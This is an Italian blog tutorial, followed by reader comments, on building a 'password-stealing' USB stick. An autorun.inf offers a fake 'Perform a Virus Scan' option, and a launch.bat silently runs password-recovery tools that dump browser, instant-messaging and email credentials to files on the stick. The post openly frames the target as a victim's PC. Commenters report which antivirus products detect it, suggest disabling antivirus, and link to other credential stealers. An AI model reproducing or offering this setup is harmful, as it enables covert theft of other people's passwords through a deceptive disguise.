Molti utenti utilizzano Windows XP/Vista. Molti utenti utilizzano software quali Internet Explorer, Firefox, Live Messenger ed Outlook. Molti utenti non si curano minimamente del fatto che tutte le password conservate in questi programmi sono facilmente rintracciabili da soggetti terzi. Molti utenti lasciano che l’autorun di dischi e dispositivi USB faccia il proprio comodo senza batter ciglio. Molti utenti credono che aver installato un antivirus – magari non aggiornato dai tempi delle guerre puniche – li protegga contro qualsiasi minaccia informatica e tendono a cliccare ovunque gli capiti.
Con questo quadretto (abbastanza desolante) di fronte a noi, possiamo dar libero sfogo alla nostra fantasia da geek e mettere in pratica un esperimento a metà strada tra il perfido e l’astuto: la creazione di una penna USB ruba-password che, una volta inserita nel PC della vittima designata, avvia una finta scansione antivirus mentre salva in alcuni file di testo tutte le parole chiave rintracciate in browser, programmi di chat e client di posta elettronica.
Ecco la procedura per crearne una. Ma ricordate, si tratta solo di un esperimento “simpatico”: nulla di particolarmente elaborato e, soprattutto, nulla che debba essere usato in contesti diversi da quello goliardico. Divertitevi!
- Scaricare i programmi MessenPass (recupera password da tutti i più popolari software di IM), Mail PassView (recupera password da tutti i principali client per la posta elettronica), IE Passview (recupera le password da Internet Explorer), Protected Storage PassView (recupera password da Internet Explorer, Outlook Express ed MSN Explorer) e Password Fox (recupera password da Firefox);
- Copiare gli eseguibili di tutti questi programmi (mspass.exe, mailpv.exe, iepv.exe, pspv.exe e passwordfox.exe) nella directory principale della penna USB da utilizzare come “ruba-password”;
- Aprire il Blocco Note, digitare al suo interno quanto segue e salvare il file come autorun.inf, sempre nella directory principale della penna USB:
- Aprire il Blocco Note, digitare al suo interno quanto segue e salvare il file come launch.bat, sempre nella directory principale della penna USB:
- Inserire la penna USB nel PC dal quale s’intende rubare le password e, nella schermata dell’autorun, selezionare la voce Perform a Virus Scan;
- Attendere che la finta procedura di scansione antivirus termini e godersi il frutto del proprio lavoro truffaldino (le parole chiave vengono tutte conservate in dei file di testo contenuti nella penna stessa).
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
Via | Hacking Tips & Tricks
Foto | Flickr
#1markgandalf
provato e molto utile anche come password recovery…
devo dire che avast, anche se aggiornato, non lo vede minimamente
mentre provato su un pc con norton ne ha sgamati 2, poi non ho proseguito e ho rimosso la chiavetta
veramente utile
grazie
#2Cia91
AVG me li ha sgamati subito….uffa…:(
#3padim
Un post…dal passato!
#4Aston
2 Domande..
Se devo mettere quei file nella directory principale significa che non devo metterle in nessuna cartella, giusto?
Se il computer non
#5Aston
Aston dice:
Ooops, lasciate perdere la seconda ^^
#6M@ttia
Aggiungerei un @echo off all’inizio del file bat 😉
#7Suxsem
viene rilevato subito…
usate qualcosa di più serio…
uno script per messenger che ruba le password dei contatti
http://hackeco.forumfree.net/?t=41731864
(sono l’autore 🙂 )
#8Pirate..
ma scusa… per PERFORM A VIRUS SCAN… la scansiione la fa come ??? e con il mio antivirus????
POI, se io metto come action , per esempio, Procedura di recovery password, nell’autoplay mi uscirà la voce chiamata così ma farà comunque una scansione fake o recupererà solo le password in modo silenzioso??
grazie
#9marco
super sgamati da McAfee 🙁
#10damiano
mi permetto di segnalare un link con qcs di meglio:
http://www.chicchedicala.it/2007/12/11/rubare-tutte-le-password-di-un-pc-con-lupen-pen-drive/
damiano
#11soma
questa guida è un aranzullata…
Inoltre vecchia vecchia!!
#12Andrea Guida (Naqern)
@ markgandalf: grazie a te! 😉
@ Pirate..: puoi mettere qualsiasi voce ed uscirà quella nell’autoplay
@ Aston: esatto
ciao! 🙂
#13Andrea Guida (Naqern)
@ Pirate..: scusa ma mi era sfuggita la prima parte della tua domanda. L’antivirus non c’entra niente, quella dicitura è solo uno specchietto per le allodole.
Rimanendo in tema, anche avira non sembra rilevare alcunché. 😉
ciao!
#14Pirate..
@ Andrea Guida (Naqern):
Capito tutto….
Grazie
ciao
#15AndreaTek
PasswordFox non mi funziona, dà sempre errore, in compenso funziona quello per Google Chrome 😀
Si chiama ChromePass
#16Andrea Guida (Naqern)
@ Pirate..: di nulla 😉
@ AndreaTek: strano, a me va alla perfezione.
ciao! 🙂
#17FrancescO
Per le pass di Opera c’è niente?
#18forniture alberghiere
Si nella lista era meglio indicare di chiudere l’anticirus o probabilmente i files verranno cvancellati, super grazie per la dritta.
#19forniture alberghiere
Si nella lista era meglio indicare di chiudere l’anticirus o probabilmente i files verranno cvancellati, super grazie per la dritta.
Per mettere i files nella sottocartella, penso sia sufficente cambiare i percorsi dei .exe nel file launch.bat
#20andrea
è molto interessante e utile l'unico problema che ho trovato e nell'estrarre MSPASS e PSPV al momento dell'estrazione il pc li cancellava dalla cartella
#21Enricop
bello bello! funziona su seven pro 64 bit.. l'unica cosa è che non riesco ad abilitare la parte dell'autorun.inf.. mi aiutate please?
inoltre, se creo una cartella a parte e avvio a mano funzia lo stesso?
grazieee
#22lauro
Ciao chi mi sa dire come fare? o dove postare se voi non sapete??
ho riscontrato svariate volte il messaggio dove mi ricorda che la partizione “ os_tools (E).__Verificando effettivamente ho :__Disco locale (C:) 70GB su 102GB __HP_RECOVERY (D:) 467MB su 7,42 GB __OS_TOOLS(E:) 6,05MB su 1,55 GB__Il notebook è hp ed è installato Vista Home Basic OEMAct__Cosa serve L’ HP_RECOVERY (D:) ?__Cosa serve L’ OS_TOOLS(E:) ?__Posso velocizzare il pc?
#23_luigi75
Dall'articolo……
"Molti utenti utilizzano Windows XP/Vista. Molti utenti utilizzano software quali Internet Explorer, Firefox, Live Messenger ed Outlook. Molti utenti non si curano minimamente del fatto che tutte le password conservate in questi programmi sono facilmente rintracciabili da soggetti terzi. Molti utenti lasciano che l’autorun di dischi e dispositivi USB faccia il proprio comodo senza batter ciglio. Molti utenti credono che aver installato un antivirus – magari non aggiornato dai tempi delle guerre puniche – li protegga contro qualsiasi minaccia informatica e tendono a cliccare ovunque gli capiti….. […]"
…e che vita dimmerda ad usare quella schifezza di winzozz……
#24Mitto
Certamente è meglio del mac
#25Fede
ho fatto tutto alla lettera ma perchè quando inserisco la chiavetta nel mio pc nn mi viene fuori nell'autoplay la voce " Perform a Virus Scan" ??____ps io sia i programmi ke l'autorun ke il launch li ho messi dentro la chiavetta dentro una cartella è un problema? o dovevo metterli semlicemente dentro la chiavetta senza creare nessuna cartella?
#26Mitto
Scusate chi mi sa dire dove è laq directory principale della pen drive
#27Luca
scusa, ma quando inserisco la chiavetta non mi si avvia la copia automatica, mi chiede la scansione, ma devo avviare manualmente il file .bat per ottenere le password
#28ERNESTO
scusa ma qual’e la directory del usb
#29Nicholas
a me non parte l'autorun
#30Giuseppe
t tyvmj
#31Fede
Buonasera, mi sono imbattuta nel suo blog e volevo chiedere un’informazione che non riesco a trovare nel suo utilissimo sito! Spero possa rispondermi ed aiutarmi!
Da una chiavetta usb, è possibile risalire ad un pc? Mi spiego meglio, se su una chiavetta usb volessi mettere un video o un file, sarebbe possibile poi risalire all’origine di quel file? Cioè è possibile capire da che pc è stato preso?
Grazie mille e scusi se mi permetto di chiedere ma nn so a chi rivolgermi!
Federica